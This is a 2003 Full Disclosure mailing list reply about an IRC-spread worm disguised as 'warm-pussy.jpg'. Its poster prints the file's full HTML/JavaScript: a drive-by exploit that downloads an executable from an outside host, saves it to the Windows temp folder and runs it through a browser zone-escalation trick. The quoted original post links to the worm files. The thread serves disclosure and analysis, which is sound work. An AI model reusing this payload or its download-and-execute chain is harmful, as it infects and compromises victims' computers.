Full Disclosure mailing list archives
Re: new worm - "warm-pussy.jpg".
From: "segfault" <segfault () nycap rr com>
Date: Wed, 12 Nov 2003 14:36:41 -0500
You idiot. Just because a file is called warm-pussy.jpg, doesn't mean that the webserver it resides on isn't going to parse it's actual content (which is probably plaintext). Look again, I'm sure you'll be surprised. Contents of warm-pussy.jpg: <html> <head> </head> <body onLoad="doit()"> <p> <textarea id="code" style="display: none;"> s=new ActiveXObject("ADODB.Stream"); s.Mode=3; s.Type=1; s.Open(); x=new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET","http://vnm.musx.net/moep.exe",0); x.Send(); s.Write(x.responseBody); s.SaveToFile("C:\\windows\\temp\\browsercheck.exe",2); </textarea> <textarea id="code2" style="display: none;"> md="<object id=\"oFile\""+ " classid=\"clsid:11111111-1111-1111-1111-111111111111\""+ " codebase=\"c:/windows/temp/browsercheck.exe\"></object>"; w=createPopup(); w.document.clear(); w.document.write(md); </textarea> <script language="javascript"> function preparecode(code) { result = ''; lines = code.split(/\r\n/); for (i=0;i<lines.length;i++) { line = lines[i]; line = line.replace(/^\s+/,""); line = line.replace(/\s+$/,""); line = line.replace(/[\\]/g,"\\\\"); line = line.replace(/'/g,"\\'"); line = line.replace(/"/g,"\\\""); line = line.replace(/[/]/g,"%2f"); line = line.replace(/\r\n/,""); line += ' '; if (line != '') { result += line; } } return result; } function weiter() { open(myURL,"_search"); } function starten(thecode) { mycode = preparecode(thecode); myURL = "file:javascript:eval('" + mycode + "')"; open("http:///","_search"); setTimeout("weiter()", 500); } function doit() { starten(document.all.code.value); setTimeout("doit2()", 600); } function doit2() { starten(document.all.code2.value); } </script> </p> <p> </p> <p><br> </p> <p></p> <p> <img src="nice_warm_pussy.jpg" width="640" height="480"><br> </p> <p><br> </p> </body> </html> ----- Original Message ----- From: "Tom Russell" <kalleth () nildram co uk> To: <full-disclosure () lists netsys com> Sent: Wednesday, November 12, 2003 1:34 PM Subject: [Full-disclosure] new worm - "warm-pussy.jpg".
Manifests itself in an infected victim by saying over IRC (mIRC it seems): 1824.11| [inx-dj|eJ-Kevin] rofl wie geil, gibt euch das :)) http:// vnm.musx.net /warm-pussy.jpg <--- einfach geil ! (spaces added to guard against accidental infection) It is unknown at this time wether this is another variant of
irc.trojan.fgt.
The files used in this worm can be obtained at http://kalleth.2tone-dev.com/fd/warm-pussy.rar in unaltered form - be careful what you do with them. (i take no responsibility for accidental infection.) Regards, Tom Russell, 2tone:development (www.2tone-dev.com) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- new worm - "warm-pussy.jpg". Tom Russell (Nov 12)
- Re: new worm - "warm-pussy.jpg". segfault (Nov 12)
- Re: new worm - "warm-pussy.jpg". Blue Boar (Nov 12)
- Re: new worm - "warm-pussy.jpg". segfault (Nov 12)
- Re: new worm - "warm-pussy.jpg". Gadi Evron (Nov 12)
- Re: new worm - "warm-pussy.jpg". Scott Taylor (Nov 12)
- Re: new worm - "warm-pussy.jpg". Valdis . Kletnieks (Nov 12)
- Re: new worm - "warm-pussy.jpg". Evidence (Nov 13)
- Re: new worm - "warm-pussy.jpg". I.R. van Dongen (Nov 13)
- Re: new worm - "warm-pussy.jpg". Blue Boar (Nov 12)
- <Possible follow-ups>
- Re: new worm - "warm-pussy.jpg". Feher Tamas (Nov 13)
- Re: new worm - "warm-pussy.jpg". segfault (Nov 12)